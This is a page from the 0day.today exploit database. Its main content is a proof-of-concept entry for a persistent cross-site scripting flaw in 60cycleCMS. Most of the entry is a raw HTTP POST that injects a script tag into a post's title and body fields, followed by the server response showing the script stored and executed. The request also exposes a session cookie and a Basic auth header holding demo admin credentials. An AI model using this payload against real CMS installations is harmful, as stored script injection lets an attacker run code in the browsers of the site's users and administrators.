0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
60cycleCMS Persistent XSS Vulnerability
======================================= 60cycleCMS Persistent XSS Vulnerability ======================================= # Software 60cycleCMS # Category CMS / Portals # Plateform php # Proof of concept # Targeted URL: http://server/60cycleCMS/private/select.php?act=edit In Edit Field provide the malicious script to store in the Database.. ======================================================================= Request - ======================================================================= POST /60cyclecms/private/preview.php HTTP/1.1 Host: demo.opensourcecms.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://server/60cyclecms/private/edit.php Cookie: __utma=87180614.1562082400.1268211497.1268211497.1268211497.1; __utmb=87180614.6.10.1268211497; __utmc=87180614; __utmz=87180614.1268211497.1.1.utmcsr=php.opensourcecms.com|utmccn=(referral)|utmcmd=referral|utmcct=/scripts/details.php; PHPSESSID=f6e21193e32af41e62a0c82a839d3a1e Authorization: Basic YWRtaW46ZGVtbzEyMw== Content-Type: application/x-www-form-urlencoded Content-Length: 122 title="><script>alert("XSS")</script>&body="><script>alert("XSS")</script>&time=&timezone= ======================================================================= ======================================================================= Response- ======================================================================= HTTP/1.1 200 OK Date: Wed, 10 Mar 2010 09:32:14 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7a mod_bwlimited/1.4 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 621 Content-Type: text/html <html> <body> <h2>Post Preview:</h2> <form action="" method="post"> <input type="button" value="Edit Post" onclick="submitForm(this)"> <input type="button" value="Submit Post" onclick="submitForm(this)"> </form> <script type="text/javascript"> function submitForm(button) { if (button.value == "Edit Post") button.form.action = "edit.php"; else button.form.action = "submit.php"; button.form.submit(); } </script> <h2 class="lonelyPost"><a class="titleLink" href="#">"><script>alert("XSS")</script></a></h2><h4>Thursday, January 1, 1970 - 12:00 am</h4><p>"><script>alert("XSS")</script></p></body> </html> ======================================================================= After execution Just click on the Edit button and the script get executed again and again. # 0day.today [2024-07-05] #